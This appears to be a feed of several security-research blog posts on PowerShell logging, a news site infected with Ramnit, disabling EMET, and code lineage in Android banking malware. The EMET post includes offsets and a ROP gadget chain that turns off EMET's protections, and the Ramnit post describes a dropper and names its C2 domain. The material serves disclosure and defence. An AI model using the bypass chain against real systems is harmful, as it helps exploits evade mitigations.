»      HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellScriptBlockLogging → EnableScriptBlockLogging = 1

Transcription

Transcription creates a unique record of every PowerShell session, including all input and output, exactly as it appears in the session. Transcripts are written to text files, broken out by user and session. Transcripts also contain timestamps and metadata for each command in order to aid analysis. However, transcription records only what appears in the PowerShell terminal, which will not include the contents of executed scripts or output written to other destinations such as the file system.

PowerShell transcripts are automatically named to prevent collisions, with names beginning with “PowerShell_transcript”. By default, transcripts are written to the user’s documents folder, but can be configured to any accessible location on the local system or on the network. The best practice is to write transcripts to a remote, write-only network share, where defenders can easily review the data and attackers cannot easily delete them (see reference 2 below). Transcripts are very storage-efficient (less than 6 KB per execution of Invoke-Mimikatz), easily compressed, and can be reviewed using standard tools like grep.

To enable transcription:

1.     In the “Windows PowerShell” GPO settings, set “Turn on PowerShell Transcription” to enabled.
2.     Check the “Include invocation headers” box, in order to record a timestamp for each command executed.
3.     Optionally, set a centralized transcript output directory.

This directory should be a write-only, restricted network share that security personnel can access. If no output directory is specified, the transcript files will be created under the user’s documents directory.

Alternately, setting the following registry values will enable logging:

»      HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellTranscription → EnableTranscription = 1
»       HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellTranscription → EnableInvocationHeader = 1
»      HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellTranscription → OutputDirectory = “” (Enter path. Empty = default)

Log Settings

Where possible, Mandiant recommends enabling all three log sources: module logging, script block logging and transcription. Each of these sources records unique data valuable to analyzing PowerShell activity. In environments where log sizes cannot be significantly increased, enabling script block logging and transcription will record most activity, while minimizing the amount of log data generated. At a minimum, script block logging should be enabled, in order to identify attacker commands and code execution.

Ideally, the size of the PowerShell event log Microsoft-Windows-PowerShell%4Operational.evtx should be increased to 1 GB (or as large as your organization will allow) in order to ensure that data is preserved for a reasonable period. PowerShell logging generates large volumes of data that quickly rolls the log (up to 1 MB per minute has been observed during typical admin or attacker activity).

The Windows Remote Management (WinRM) log, Microsoft-Windows-WinRM%4Operational.evtx, records inbound and outbound WinRM connections, including PowerShell remoting connections. The log captures the source (inbound connections) or destination (outbound connections), along with the username used to authenticate. This connection data can be valuable in tracking lateral movement using PowerShell remoting. Ideally, the WinRM log should be set to a sufficient size to store at least one year of data.

Due to the large number of events generated by PowerShell logging, organizations should carefully consider which events to forward to a log aggregator. In environments with PowerShell 5.0, organizations should consider, at a minimum, aggregating and monitoring suspicious script block logging events, EID 4104 with level “warning”, in a SIEM or other log monitoring tool. These events provide the best opportunity to identify evidence of compromise while maintaining a minimal dataset.

Appendices

References

  1. http://blogs.msdn.com/b/powershell/archive/2016/01/19/windows-management-framework-wmf-4-0-update-now-available-for-windows-server-2012-windows-server-2008-r2-sp1-and-windows-7-sp1.aspx
  2. http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
  3. https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf

Special thanks to Lee Holmes and the Microsoft PowerShell team.

[1] See the Shmoocon 2016 presentation “No Easy Breach” by Mandiant consultants Matthew Dunwoody and Nick Carr for some additional context of our experience analyzing PowerShell attacks: https://archive.org/details/No_Easy_Breach.

Maimed Ramnit Still Lurking in the Shadow

$
0
0

Newspapers have the ability to do more than simply keep us current with worldly affairs; we can use them to squash bugs! Yet, as we move from waiting on the newspaper delivery boy to reading breaking news on ePapers, we lose the subtle art of bug squashing. Instead, we end up exposing ourselves to dangerous digital bugs that can affect our virtual worlds.

This is exactly what happened to visitors of one of the top five news sites of China. Any users running Internet Explorer (IE) who navigated to the website may have been exposed to an old, yet persistent VBScript worm that has the ability to self-replicate recursively from infected machines. Incidentally, the major actors involved with this old campaign have been taken down, yet traces of their injected recursive malware have still managed to sneak on to one of the highest browsed sites in China.

The FireEye Dynamic Threat Intelligence (DTI) first discovered that the site was compromised and used to host VBS/Ramnit on Jan. 28, 2016. We can confirm that the infection is still live as of the time of this writing. IE users who visit the site may be compromised if they browse to a specific page (paperindex[.]htm) and click ‘Yes’ to run ActiveX, which may appear to be safe since the website is familiar and popular. There is no exploit used for infection, simply social engineering and errant clicks.

As shown in Figure 1, a malicious VBScript is appeneded after the HTML body. Upon landing on this page, the victim’s browser will load the news content while it executes a malicious ActiveX component in the background.

Figure 1: Legitimate HTML page appended with malicious VBScript

As shown in Figure 2 and Figure 3, the VBScript drops a binary named “svchost.exe” in the %TEMP% folder and executes it upon successful ActiveX execution. In a case where the system is compromised, it also tries to connect to a CnC server, fget-career[.]com, which has been involved in campaigns for this trojan before.

Figure 2: The VBScript drops the binary in the %TEMP% folder and executes it

Figure 3: The full path to “svchost.exe” (using Internet Explorer 11 on Windows 7)

Successful execution of the VBScript and the delivery of W32.Ramnit onto the victim’s machine depends on the user’s browser, as well as the browser’s setting. Since Chrome and Firefox do not support client-side VBScript, only IE users are susceptible to this attack.

Fortunately, recent versions of IE do not run code automatically by default. Instead, users will see two popup warnings when the browser is rendering potentially dangerous objects such as ActiveX components, as shown in Figure 4 and Figure 5.

Figure 4: First warning for blocked content in IE 11

Figure 5: Second warning for blocked content in IE 11

Only when the victim clicks on “Yes” will the browser execute the blocked content. In this case, the IE executes the VBScript, drops the payload, and executes it in the background while the user simply sees the usual news page.

As long as users click “No” to disallow ActiveX components, they will remain safe from W32.Ramnit. However, this type of social engineering continues to be successful. When a legitimate site is compromised to host exploits or malware, the positive reputation of the site is leveraged to trick users into clicking “Yes” and becoming infected. The potential impact of this particular threat is compounded by the fact that the compromised site is ranked in the Alexa Top 100 for most visited sites internationally, and is in the Top 25 for most popular websites in China [1].

FireEye appliances detect this infection at multiple levels. FireEye’s multiflow detection traces out the complete attack chain, as well as CnC communication. While the CnC host has been suspended for a long time, the worm’s presence alone can be a pain for the victim because it adds itself into all HTML files that it can access. Additionally, it adds itself to the startup registry and impacts the machine’s performance.

So the question that you need to ask yourself is this: If a Top 100 Alexa domain is still infected by this veteran malware, are you?

Using EMET to Disable EMET

$
0
0

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) is a project that adds security mitigations to user mode programs beyond those built in to the operating system. It runs inside “protected” programs as a Dynamic Link Library (DLL), and makes various changes in order to make exploitation more difficult.

EMET bypasses have been seen in research and past attacks [2, 3, 4, 5, 6, 7, 8]. Generally, Microsoft responds by changing or adding mitigations to defeat any existing bypasses. EMET was designed to raise the cost of exploit development and not as a “fool proof exploit mitigation solution” [1]. Consequently, it is no surprise that attackers who have read/write capabilities within the process space of a protected program can bypass EMET by systematically defeating each mitigation [2].

If an attacker can bypass EMET with significantly less work, then it defeats EMET’s purpose of increasing the cost of exploit development. We present such a technique in the section New Technique to Disable EMET. Microsoft has issued a patch to address this issue in EMET 5.5.

After discussing this new technique, we describe previously documented techniques used to either bypass or disable EMET. Please refer to the appendix if you’d like to know more about what kind of protections are implemented by EMET.

New Technique to Disable EMET

EMET injects emet.dll or emet64.dll (depending upon the architecture) into every protected process, which installs Windows API hooks (exported functions by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks provide EMET the ability to analyze any code calls in critical APIs and determine if they are legitimate. If code is deemed to be legitimate, EMET hooking code jumps back into the requested API. Otherwise it triggers an exception.

However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.

This feature exists because emet.dll contains code for cleanly exiting from a process. Conveniently, it is reachable from DllMain.

Prototype of DllMain :
BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);

Note that the first parameter provides the base address of the DLL. The second provides the parameter that the PE loader uses to communicate if the DLL is being Loaded or Unloaded, 1 or 0 respectively. If the fdwReason is 1, the DLL knows that it is being loaded and initializes. If the fdwReason parameter is 0 (DLL_PROCESS_DETACH), emet.dll initiates the unloading code, thus it simply goes through the exit routine assuming that it’s being unloaded, and it removes its hooks and exception handlers, thereby simply removing EMET’s checks. Note that this will not remove EMET from memory; it just ensures all of its protections are disabled.

This kind of feature could exist in any detection-oriented product, which relies on user-space hooks, and in order to make sure the product does not break, there has to be an unloading routine that removes all protection checks. EMET’s DllMain can be found through a small Return Oriented Programming (ROP) gadgets chain shown in the next section, which just jumps to the DllMain with the right parameters to unload EMET protection checks.

BOOL WINAPI DllMain (GetModuleHandleW("EMET.dll") , DLL_PROCESS_DETACH , NULL);

The GetModuleHandleW function is not hooked by EMET since it is not considered as critical Windows API. We use this function to retrieve the base address of emet.dll. Since the PE header is located at the base address, we have to use it to find the address of the DllMain to send the required parameters.

Disabling EMET - Details

In EMET.dll v5.2.0.1, there is a global variable at offset 0xF2958 of emet.dll. EMET uses this variable as a pointer to an array of structures to track the detoured APIs, and each structure has size 0x18 bytes, as shown below:

struct Detoured_API {
BOOL isActive;                                 // isActive field shows the hooking status, Active: 0x1
PVOID DetouredAPIConfig;             // pointer to Detoured_API_Config structure
PVOID nextDetouredAPI;                 // pointer to the next Detoured_API structure
DWORD valueX;
DWORD valueY;
DWORD valueZ;
};

The last three variables are not relevant to this article’s analysis. DetouredAPIConfig holds a pointer value to another structure we named Detoured_API_Config, with size 0x18 bytes.

struct Detoured_API_Config {
PVOID DetouredWindowsAPI;          // pointer to the detoured Windows API
PVOID EMETDetouringFunction;      // pointer to where EMET protection implemented
PVOID DetouredFunctionPrologue;  // pointer to the Windows API prologue
DWORD valueX;
DWORD valueY;
DWORD valueZ;
}

Note that between EMETDetouringFunction and DetouredFunctionPrologue there is always 0x26 bytes, where EMET prepares the required parameters for the protection function (where the caller code gets inspected). It then calls the protection function to do the check. In this same 0x26 bytes, EMET stores some other meta-data such as the size of the detoured function prologue. The third field in Detoured_API_Config structure is DetouredFunctionPrologue. Jumping to that address will result in calling the unhooked Windows API, since it jumps back to execute the rest of the Windows API functions after executing the function prologue.

The function behind removing EMET hooks is located at offset 0x27298, which is shown in Figure 1.

Figure 1: Function at offset 0x27298 responsible for removing EMET hooks

To unload, the function at offset 0x27298 loops through all Detoured_API structures, and zeroes out DetouredFunctionPrologue for each associated Detoured_API_Config structure. Then it calls Patch_Functions (the function at offset 0x27B99), which is responsible for patching all of the detoured Windows APIs. To do that, it uses memcpy (as shown in Figure 2) to copy the API function prologue piece of code back into the detoured function. This is in order to make it as it was before detouring.


Figure 2: Code that removes detours

After looping through all the detoured APIs and patching them with memcpy, you see that all the detours in Windows APIs are gone, as show in Figure 3 and Figure 4, before and after respectively.

Figure 3: Before calling DllMain with unloading parameters

Figure 4: After calling DllMain with unloading parameters

EMET then continues to disable EAF and EAF+ protections. In the function at offset 0x609D0, EMET zeros out and reinitializes CONTEXT structure, and manipulates debugging registers (as shown in Figure 5). However, at the end of the function, EMET calls NtSetContextThread, which results in zeroing out the debugging registers, and hence disabling EAF and EAF+ protections.


Figure 5: EAF & EAF+ disabling code

Finally, at the end of the function at offset 0x60FBF, EMET calls the function located at offset 0x60810 that calls RemoveVectoredExceptionHandler to remove the defined vectored exception handler, which has been added using AddVectoredExceptionHandler.

Disabling EMET– ROP Implementation

Using an old and patched vulnerability, CVE-2012-1876, we built ROP gadgets on top of an already existing exploit, and executed it with EMET protections enabled. After our ROP gadgets called the DllMain function of EMET.dll with parameters (EMET.dll base address, 0, 0), we returned to execution, and all the detours placed in the hooked Windows APIs were gone along with EAF and EAF+ protections.

XCHG EAX,ESP # RETN // Stack Pivot & Rop Starts

POP EAX # RETN // Pop GetModuleHandle PTR from IAT

<GetModuleHandleW>// mshtml.dll base + offset in IAT

JMP [EAX]// Jump into GetModuleHandleW pointer

POP EBX # RETN // return address when EIP = GetModuleHandleW

EMET_STRING_PTR// Argument 1 for GetModuleHandleW i.e. EMET.dll string

//After GetModuleHandle returns esp is here while (EIP = POP EBX # RETN)

0x0000003c// 0x3c goes into EBX

ADD EBX,EAX # RETN // EAX = EMET.dll address & EBX = 0x3c offset for IMAGE_DOS_HEADER::e_lfanew

XOR EBP,EBP # RETN // clear out EBP

ADD EBP,EAX # RETN // ADD EAX into Nulled EBP

ADD EAX,[EBX] # RETN // [EBX] = poi(EMET_DLL_BASE+0x3c) => EAX = offset for PE header

POP EBX # RETN // pop 0x28 in EBX

0x00000028

ADD EBX,EAX # RETN // add 0x28 with PE header offset from base address (RVA of OEP)

XOR EAX,EAX # RETN // NULL EAX

ADD EAX,EBP # RETN // ADD previously copied EMET_DLL_BASE to NULLed EAX

ADD EAX,[EBX] # RETN // ADD EMET_DLL_BASE with OEP RVA => EAX = VA of OEP

XCHG EAX,ECX # RETN // copying EAX into ECX

XOR EAX,EAX # RETN // NULL EAX

ADD EAX,EBP # RETN // copy EMET_DLL_BASE into eax

XCHG EAX,ESI # RETN // copy EMET_DLL_BASE into EAX

// ESI contains EMET_DLL_BASE & ECX contains OEP address

PUSH ESI # CALL ECX # RETN // call OEP of EMET.dll with EMET_DLL_BASE on top of stack as PARAM1

0x0 // PARAM2 fdwReason == DLL_PROCESS_DETACH | 0

0x0// PARAM3 Reserved

// When Call ECX returns to RETN instruction stack top is as following

// and All hooks are gone Since EMET.dll just received a DETACH signal

Previous EMET Bypass Techniques

Previous techniques used to bypass EMET protections generally exploit design and implementation flaws, were possible because of some module or API was left out and not secured. We will describe a few of these bypass techniques.

Since LoadLibrary is a critical API, EMET 4.1 raises an exception if it gets called with either a return or jump instruction, but Jared DeMott showed that calling LoadLibrary API with a call instruction instead of jumping or returning bypasses EMET LoadLibrary protection [2].

The LoadLibrary API is monitored in order to prevent loading UNC paths (i.e. \evilbad.dll). Aaron Portnoy showed that this could be bypassed by using MoveFile API (which is not monitored by EMET 4.0) to download a DLL file that can then be loaded by LoadLibrary API [3].

Caller check protection in EMET 4.1 is used to prevent ROP gadgets by checking if a critical Windows API has been called with a call instruction, return instruction, or jump instruction – the latter two are widely used in ROP gadgets. DeMott showed a way to bypass caller check protection by executing a legitimate call to the critical API function [2]. Instead of calling VirtualAlloc API directly with a return or jump instruction (which will cause EMET to raise an exception), DeMott used a call instruction to VirtualAlloc API in one of the loaded modules, and by returning to the address of that call instruction, the critical Windows API gets called without having EMET get in the way.

Critical Windows API functions are located in kernel32.dll, ntdll.dll and kernelbase.dll; EMET 3.5 was hooking the functions exported by the first two modules, but not for kernelbase.dll. Shahriyar Jalayeri used this fact to execute VirtualProtect API located in the kernelbase module to make the memory writable and executable [4]. However, after EMET 4.0 was released, the Deep Hooks protection is hooking even the lowest level of critical Windows API functions.

Jalayeri also bypassed EMET by using the _KUSER_SHARED_DATA structure (which has a fixed address) located in 0x7ffe0000, wherein at offset 0x300 there is a SystemCallStub pointer that points to KiFastSystemCall, which is the typical way to execute sysenter instruction. With that, he was able to call any system call by specifying its number in the EAX register (e.g. 0x0D7 for ZwProtectVirtualMemory). Additionally, Jalayeri was able to deactivate EMET completely by patching the function prologue with a return instruction to make it ineffective.

EAF protection uses debug registers to place breakpoints on accesses of exported functions in modules such as kernel32.dll, ntdll.dll and kernelbase.dll. These breakpoints can be bypassed using a shellcode that uses the import access table instead of the export access table (since this protection is applicable for export access table only).

Previous EMET Disabling Techniques

Unlike bypasses, which circumvent protections, disabling EMET turns off its protections entirely. For example, EAF (and EAF+ partially) can be disabled by clearing hardware breakpoints (i.e. zero out the debugging registers). Piotr Bania used the undocumented Windows APIs NtSetContextThread and NtContinue to achieve this, but since NtSetContextThread is hooked by EMET, one should first disable other EMET protections to make NtSetContextThread usable [5].

Offensive Security found that most of EMET 4.1 protections first check the value of an exported global variable located at offset 0x0007E220 in emet.dll; if that variable’s value is zero, then the protection body proceeds without interfering with the caller code [6]. It turned out that the global variable is the global switch used to turn on/off EMET protections, and by having that variable in a writable data section, attackers can craft ROP gadgets to zero out that variable easily.

After doing some analysis, we found that EMET v2.1 has the same global switch located in the offset 0xC410, and because of this we suspect that EMET has the global switch weakness from the earliest versions of EMET by having the global variable in fixed addresses. This was the case until EMET 5.0 was released.

Offensive Security found that in EMET 5.0, Microsoft put that global variable on the heap within a large structure (i.e. CONFIG_STRUCT) with the size of 0x560 bytes [7]. However, the same concept is still applicable since there is a pointer to the CONFIG_STRUCT structure located in a fixed offset 0x0AA84C. As a protection, EMET was encoding this pointer value with EncodePointer function, and every time the EMET protection needed to check that value, it would decode it with DecodePointer function to get the CONFIG_STRUCT address. Zero out CONFIG_STRUCT+0x558 turns off most of EMET protections. Additionally, to turn off EAF and EAF+ they used unhooked pointers to NtSetContextThread stored at CONFIG_STRUCT+0x518.

In EMET 5.1, Offensive Security found that the global variable holds encoded pointer values to some structure (i.e. EMETd), which is stored in the offset 0xF2A30 [8]. The EMETd structure has a pointer field to the CONFIG_STRUCT structure that holds the global switch at the offset CONFIG_STRUCT+0x558 as additional protection layer to the pointer’s encoding. EMET 5.1 uses the cpuid instruction to XOR the returned values with the encoded pointer’s values. To decode CONFIG_STRUCT, they used the code in the offset 0x67372 of emet.dll, which decodes the EMETd structure and then returns back the decoded pointer of CONFIG_STRUCT. Since the global switch (i.e. CONFIG_STRUCT+0x558) is stored in a read-only memory page, Offensive Security found a way to change that by using unhooked pointers stored in EMET at fixed addresses. They used an unhooked pointer to ntdll!NtProtectVirtualMemory stored at CONFIG_STRUCT+0x1b8 to mark it as a writable memory page, so they can zero out the global switch at CONFIG_STRUCT+0x558. For disabling EAF and EAF+, they have used the unhooked pointer to NtSetContextThread stored at CONFIG_STRUCT+0x518, the same as what they did in disabling EMET 5.0.

Conclusion

This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is exported, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).

The inclusion and accessibility of code to disable EMET from within EMET creates a significant new attack vector. Locating the DllMain and calling it to shutdown all of EMET’s protections is significantly easier than bypassing each of EMETs protections as they were designed, and consequently undermines their value.

Special thanks to: Michael Sikorski, Dan Caselden, Corbin Souffrant, Genwei Jiang, and Matthew Graeber.

Appendix

EMET Protections

EMET has evolved through many years, and a brief description of features is provided below:

EMET 1.x, released in October 27, 2009

Structured Exception Handling Overwrite Protection (SEHOP): Provides protection against exception handler overwriting.
Dynamic Data Execution Prevention (DEP): Enforces DEP so data sections such as stack or heap are not executable.
NULL page allocation: Prevents exploitation of null dereferences.
Heap spray allocation: Prevents heap spraying.

EMET 2.x, released in September 02, 2010

Mandatory Address Space Layout Randomization (ASLR): Enforces modules base address randomization; even for legacy modules, which are not compiled with ASLR flag.

Export Address Table Access Filtering (EAF): Normal shellcode (e.g. Metasploit shellcode) iterates over the exported functions of loaded modules to resolve critical Windows API functions, which are normally exported by kernel32.dll, ntdll.dll and kernelbase.dll. EMET uses hardware breakpoints stored in debugging registers (e.g. DR0) to stop any thread which tries to access the export table of these modules, and lets the EMET thread verify whether it is a legitimate access.

EMET 3.x, released in May 25, 2012

Imported mitigations from ROPGuard to protect against Return Oriented Programming (ROP).
Load Library Checks: Prevents loading DLL files through Universal Naming Convention (UNC) paths.
ROP Mitigation - Memory protection checks: Protects critical Windows APIs like VirtualProtect, which might be used to mark the stack as executable.
ROP Mitigation - Caller check: Prevents critical Windows APIs from being called with jump or return instructions.
ROP Mitigation - Stack Pivot: Detects if the stack has been pivoted.
ROP Mitigation - Simulate Execution Flow: Simulates the execution by manipulating the stack register, to see if it calls some Windows APIs without using the call instruction.  This is considered as a ROP gadget indication by EMET.
Bottom-up ASLR: Adds entropy of randomized 8-bits to the base address of the loaded modules.

EMET 4.x, released in April 18, 2013

Deep Hooks: With this feature enabled, EMET is no longer limited to hooking what it may consider as critical Windows APIs, instead it hooks even the lowest level of Windows APIs, which are usually used by higher level Windows APIs.

Anti-detours: Because EMET places a jump instruction at the prologue of the detoured (hooked) Windows API functions, attackers can craft a ROP that returns to the instruction that comes after the detour jump instruction. This protection tries to stop these bypasses.

Banned functions: By default it disallows calling ntdll!LdrHotpatchRoutine to prevent DEP/ASLR bypassing. Additional functions can be configured as well.

Certificate Trust (configurable certificate pinning): Provides more checking and verification in the certificate chain trust validation process. By default it supports Internet Explorer only.

EMET 5.x, released in July 31, 2014

Introduced Attack Surface Reduction (ASR): Allows configuring list of modules to be blocked from being loaded in certain applications.

EAF+: Similar to EAF, it provides additional functionality in protecting the export table of kernel32.dll, ntdll.dll and kernelbase.dll. It also detects whether the stack pointer points somewhere outside of the stack boundaries or if there is a mismatch between the frame and the stack pointer.

References

[1] “Inside EMET 4.0” by Elias Bachaalany, http://recon.cx/2013/slides/Recon2013-Elias%20Bachaalany-Inside%20EMET%204.pdf
[2] “Bypassing EMET 4.1” by Jared DeMott, http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
[3] “Bypassing All of The Things” by Aaron Portnoy, https://www.exodusintel.com/files/Aaron_Portnoy-Bypassing_All_Of_The_Things.pdf
[4] "Bypassing EMET 3.5's ROP Mitigations" by Shahriyar Jalayeri, https://github.com/shjalayeri/emet_bypass
[5] "Bypassing EMET Export Address Table Access Filtering feature" by Piotr Bania, http://piotrbania.com/all/articles/anti_emet_eaf.txt
[6] "Disarming Enhanced Mitigation Experience Toolkit (EMET)" by Offensive-Security, https://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet/
[7] "Disarming EMET v5.0" by Offensive-Security, https://www.offensive-security.com/vulndev/disarming-emet-v5-0/
[8] "Disarming and Bypassing EMET 5.1" by Offensive-Security, https://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/

Relational Learning Tutorial

$
0
0

At FireEye, we apply machine learning techniques to a variety of security problems. Malware detection and categorization is a great use of the technology, and we believe that it can also play a role in security challenges that extend beyond malware.

In one such R&D effort, the Innovation & Custom Engineering (ICE) team is utilizing machine learning to build statistical models of relationships between entities. These models can then be used to “connect the dots” by making predictions about relationships we haven’t observed, or to spot anomalous relationships that don’t fit expected patterns.

The most popular application of these algorithms is probably item recommendation, where they are used to personalize our consumer experiences in today’s online marketplace. There are also many important security applications, such as analyzing relationships between threat actors, TTPs, and their targets. Another is detecting attacker activity by modeling relationships between users, machines, applications, and network connections.

Figure 1 shows an example of how these algorithms can also be used for clustering and visualization. This particular model has automatically clustered several thousand machines into groups of similar function, just by observing internal network connection behavior.

Figure 1. Visualization of model-based clustering when trained on network connection relationships

We have created a tutorial that steps through building several types of relational learning models using Python and Google’s new machine learning framework, TensorFlow.  The target audience is machine learning researchers and practitioners, but security professionals who like to channel their inner “data nerd” may also find it interesting!

The tutorial and accompanying code is available as a Jupyter Notebook here.

Lessons from Operation RussianDoll

$
0
0

As defensive security controls raise the bar to attack, attackers will employ increasingly sophisticated techniques to complete their mission. Understanding the mechanics and impact of these threats is essential to systematically discover and deflect the coming wave of advanced attacks.

Mandiant has developed a comprehensive whitepaper that provides a multi-faceted analysis of the exploit payload "Operation RussianDoll." This payload is an exploit for CVE-2015-1701 embedded within the un-obfuscated 64-bit RussianDoll payload (MD5: 54656d7ae9f6b89413d5b20704b43b10). The whitepaper references a freely available open-source proof of concept and provides malware triage analysts, reverse engineers, and exploit analysts with tools and background information to recognize and analyze future exploits. It also covers how red team analysts can apply these principles to carve out exploit functionality or augment exploits to produce tools that will enhance effectiveness of security operations.

The whitepaper walks the reader through the payload's actions to understand how to loosely identify what it does once it has gained kernel privilege. It then discusses how to obtain higher-resolution answers from reverse engineering by using WinDbg to confirm assumptions, manipulate control flow, and observe exploit behavior. Building on this and other published sources, a technically detailed exploit analysis is assembled by examining the relevant portions of win32k.sys. Finally, the paper discusses how to extract and augment this exploit to load encrypted, unsigned drivers into the Windows 7 x64 kernel address space.

We hope this analysis will support security professionals' understanding of the malware used by Advanced Persistent Threat (APT) actors and of tools and techniques that may be used to conduct enhanced analysis.

Download the "Lessons from Operation RussianDoll" whitepaper here.

A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code

$
0
0

Introduction

On Feb. 19, IBM XForce researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy[2], MazarBot[3], and the SlemBunk malware recently described by FireEye[4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4] is reproduced here, which shows the major components of SlemBunk and its corresponding class names:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical one. It is started by class Main at the launching time, keeps working in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., some mobile banking app) is recognized. To keep MainService running continuously, malware authors added two receivers – ServiceStarter and SDCardServiceStarter – to check its status when particular system events are received. Both GM Bot and SlemBunk samples share the same architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in system locale and avoid starting MainService when they find the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, static variable “MainService;->a” in GM Bot has the same role as static variable “MainService;->isRunning” in SlemBunk. Malware authors commonly use this trick to make their code harder to understand. However this won’t change the fact that the underlying codes share the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for main service. In Android, when a service is started its onCreate method will be called. In method onCreate of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Then both will move forward to read an app particular preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is also on the naming of the runnable thread. Class “d” in GM Bot and class “MainService$2” in SlemBunk are employed respectively to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

